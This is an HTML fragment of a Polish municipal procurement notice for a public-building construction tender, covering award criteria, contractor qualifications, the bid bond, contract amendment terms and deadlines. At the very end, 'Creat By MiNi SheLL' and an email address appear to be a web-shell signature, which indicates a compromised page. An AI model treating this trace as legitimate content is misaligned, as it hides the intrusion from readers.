class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji na roboty budowlane</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym <br/>-	Zamawiający nie precyzuje wymagań w tym zakresie. Zamawiający dokona oceny spełnienia warunku udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w rozdziale VI ust. 1 pkt 2 SWZ;<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów <br/>-	Zamawiający nie precyzuje wymagań w tym zakresie. Zamawiający odstępuje od wymagania podmiotowych środków dowodowych w tym zakresie. Zamawiający dokona oceny spełnienia warunku udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w rozdziale VI ust. 1 pkt 2 SWZ;<br/>3)	sytuacji ekonomicznej lub finansowej <br/>-	Zamawiający nie precyzuje wymagań w tym zakresie. Zamawiający dokona oceny spełnienia warunku udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w rozdziale VI ust. 1 pkt 2 SWZ;<br/>4)	zdolności technicznej lub zawodowej <br/>-	Wykonawca spełni warunek, jeżeli wykaże, że:<br/>-	w okresie ostatnich 5 lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie należycie wykonał co najmniej jedną budowę/przebudowę obiektu użyteczności publicznej o wartości co najmniej trzech milionów złotych (wartość jednej roboty), Zamawiający dokona oceny spełnienia warunku udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w rozdziale VI ust. 1 pkt 2 SWZ oraz dokumentu określonego w rozdziale VI.A<br/>3.	Zgodnie z art. 118 ust. 1 ustawy Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu lub kryteriów selekcji, w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej podmiotów udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nimi stosunków prawnych. W przypadku o którym mowa w ust. 3 Wykonawca winien dołączyć do oferty zobowiązanie podmiotu trzeciego.<br/>4.	Ocena spełniania w/w warunków dokonana zostanie w oparciu o informacje zawarte w złożonych oświadczeniach. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki Wykonawca spełnił. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.	oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">2.	wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, dat, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – inne dokumenty – z wykazu powinno wynikać, iż Wykonawca spełnia warunki określone w rozdziale – propozycję wzoru wykazu robót, Zamawiający zamieścił jako załącznik do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Formularz oferty;<br/>2. Pełnomocnictwo jeżeli dotyczy.<br/>3. Dowód wniesienia wadium. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.Ustala się wadium w wysokości 20.000,00 zł, słownie: dwadzieścia tysięcy złotych.<br/>2. Szczegóły określono w SWZ. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Określono w SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> I. Zmiana umowy:<br/>1.	Zamawiający przewiduje, na podstawie art. 455 ust. 1 pkt 1 ustawy Pzp, możliwość dokonywania zmian postanowień niniejszej umowy, w zakresie:<br/>1)	zmiany wysokości wynagrodzenia w przypadku: <br/>a)	zmiany stawki podatku od towarów i usług oraz podatku akcyzowego, z tym zastrzeżeniem, że wartość netto wynagrodzenia wykonawcy nie zmieni się, a wartość brutto wynagrodzenia zostanie wyliczona na podstawie nowych przepisów;<br/>b)	zmiany wysokości minimalnego wynagrodzenia za pracę, z tym zastrzeżeniem, że wynagrodzenie wykonawcy ulegnie zmianie o wartość wzrostu całkowitego kosztu wykonawcy wynikającą ze zwiększenia wynagrodzeń osób bezpośrednio wykonujących niniejsze zamówienie do wysokości obowiązującego minimalnego wynagrodzenia, z uwzględnieniem wszystkich obciążeń publicznoprawnych od kwoty wzrostu minimalnego wynagrodzenia;<br/>c)	zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenie społeczne lub zdrowotne, z tym zastrzeżeniem, że wynagrodzenie wykonawcy ulegnie zmianie o wartość wzrostu całkowitego kosztu wykonawcy, jaką będzie on zobowiązany dodatkowo ponieść w celu uwzględnienia tej zmiany, przy zachowaniu dotychczasowej kwoty netto wynagrodzenia osób bezpośrednio wykonujących niniejsze zamówienie;<br/>d)	zmiany zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z 4 października 2018 r. o pracowniczych planach kapitałowych, z tym zastrzeżeniem, że wynagrodzenie wykonawcy ulegnie zmianie o wartość wzrostu kosztu wykonawcy, jaką będzie on zobligowany ponieść w przypadku zmiany przepisów dotyczących zasad gromadzenia lub wpłat podstawowych finansowanych przez podmiot zatrudniający do pracowniczych planów kapitałowych w odniesieniu do osób bezpośrednio wykonujących niniejsze zamówienie;<br/>e)	zmiany cen materiałów lub kosztów związanych z realizacją zamówienia, z tym zastrzeżeniem, że:<br/>–	minimalny poziom zmiany ceny materiałów lub kosztów, uprawniający strony umowy do żądania zmiany wynagrodzenia wynosi 20 % w stosunku do cen lub kosztów wskazanych w kosztorysie, sporządzonym na etapie przygotowania dokumentacji projektowej;<br/>–	poziom zmiany wynagrodzenia zostanie ustalony na podstawie wskaźnika zmiany cen materiałów lub kosztów ogłoszonego w komunikacie prezesa Głównego Urzędu Statystycznego, ustalonego w stosunku do miesiąca, w którym został sporządzony kosztorys;<br/>–	maksymalna wartość zmiany wynagrodzenia, jaką dopuszcza zamawiający, to łącznie <br/>5 % w stosunku do wartości wynagrodzenia brutto określonego w niniejszej umowie;<br/>2)	zmiany zakresu/sposobu realizacji świadczenia, w przypadku:<br/>a)	wycofania z produkcji materiałów przyjętych w dokumentacji;<br/>3)	zmiany terminu realizacji, w przypadku:<br/>a)	działania organów administracji lub gestorów sieci związanego z przekroczeniem określonych przez prawo terminów wydawania wymaganych w związku z realizacją przedmiotowego zamówienia, decyzji, zezwoleń, uzgodnień itp.;<br/>b)	w przypadku zawarcia umowy z wykonawcą po upływie pierwotnego terminu związania ofertą – o czas, jaki minął od upływu pierwotnego terminu związania ofertą do dnia zawarcia umowy;<br/>c)	wystąpienia niezależnych od stron okoliczności lub działania siły wyższej powodujących konieczność wprowadzenia zmian do realizowanego przedmiotu umowy,<br/>d)	terminu realizacji przedmiotu umowy w wypadku wystąpienia obiektywnych czynników uniemożliwiających realizację umowy zgodnie z pierwotnym terminem – uprawniających Strony do zmiany terminu wykonania umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-02-20 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma zamawiającego https://gmina-gietrzwald.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-02-20 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-03-21</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Ciąg dalszy ewentualnych zmian umowy:<br/>2.	Zmiany, o których mowa w ust. 1 pkt 1 lit. a–d, mogą być wprowadzone wyłącznie wtedy, gdy mają one wpływ na koszty wykonania zamówienia przez wykonawcę. W przypadku ich wystąpienia wykonawca może wystąpić do zamawiającego z pisemnym wnioskiem o zmianę wynagrodzenia, przedkładając odpowiednie dokumenty potwierdzające zasadność złożenia takiego wniosku. Wykonawca powinien wykazać ponad wszelką wątpliwość, że zaistniała zmiana ma bezpośredni wpływ na koszty wykonania zamówienia oraz określić stopień, w jakim wpłynie ona na wysokość wynagrodzenia. Wykonawca może złożyć pisemny wniosek o dokonanie waloryzacji najwcześniej w dniu wejścia w życie przepisów wprowadzających zmiany.<br/>3.	Podstawą dokonania zmian, o których mowa w ust. 1 pkt 2 i pkt 3 lit. a, będzie potwierdzenie w dokumentacji budowy, przez inspektora nadzoru, wystąpienia opisanych okoliczności uzasadniających wstrzymanie robót, z określeniem okresu wstrzymania robót wpływającego na zmianę terminu i sporządzenie protokołu konieczności – zatwierdzonego przez zamawiającego.<br/>4.	Wykonawca jest zobowiązany w terminie 5 dni roboczych od zawarcia aneksu terminowego do zaktualizowania i uzgodnienia z zamawiającym harmonogramu rzeczowo-finansowego, z zastrzeżeniem że w przypadku zawarcia aneksu terminowego, z uwagi na konieczność wstrzymania robót, aktualizacja i uzgodnienie harmonogramu rzeczowo-finansowego nastąpi nie później niż w terminie 5 dni roboczych od dnia ponownego wprowadzenia wykonawcy na teren robót.<br/>5.	W przypadku dokonania zmiany umowy na podstawie ust. 1 pkt 1 lit. e – zmiany wynagrodzenia w związku ze zmianą cen materiałów lub kosztów związanych z realizacją zamówienia – wykonawca jest zobowiązany do zmiany wynagrodzenia przysługującego podwykonawcy, z którym zawarł umowę, w zakresie odpowiadającym zmianom cen materiałów i kosztów zobowiązania podwykonawcy.<br/>6.	Zmiany umowy wymagają zachowania formy pisemnej pod rygorem nieważności.<br/>II.	Odstąpienie od umowy.<br/>Zamawiający może odstąpić od umowy:<br/>1)	w terminie 30dni od dnia powzięcia wiadomości o zaistnieniu istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, lub dalsze wykonywanie umowy może zagrozić podstawowemu interesowi bezpieczeństwa państwa lub bezpieczeństwu publicznemu;<br/>2)	jeżeli zachodzi co najmniej jedna z następujących okoliczności:<br/>a)	dokonano zmiany umowy z naruszeniem art.454 iart.455,<br/>b)	wykonawca w	chwili zawarcia umowy podlegał wykluczeniu na podstawie art.108,<br/>c)	Trybunał Sprawiedliwości Unii Europejskiej stwierdził, w ramach procedury przewidzianej wart.258 Traktatu o funkcjonowaniu Unii Europejskiej, że Rzeczpospolita Polska uchybiła zobowiązaniom, które ciążą na niej na mocy Traktatów, dyrektywy 2014/24/UE, dyrektywy 2014/25/UE i dyrektywy 2009/81/WE, z uwagi na to, że zamawiający udzielił zamówienia z naruszeniem prawa Unii Europejskiej.<br/>2.	W przypadku, o którym mowa w ust.1pkt 2 lit. a, zamawiający odstępuje od umowy w części, której zmiana dotyczy.<br/>3.	W przypadkach, o których mowa w ust.1, wykonawca może żądać wyłącznie wynagrodzenia należnego z tytułu wykonania części umowy.

Creat By MiNi SheLL
Email: jattceo@gmail.com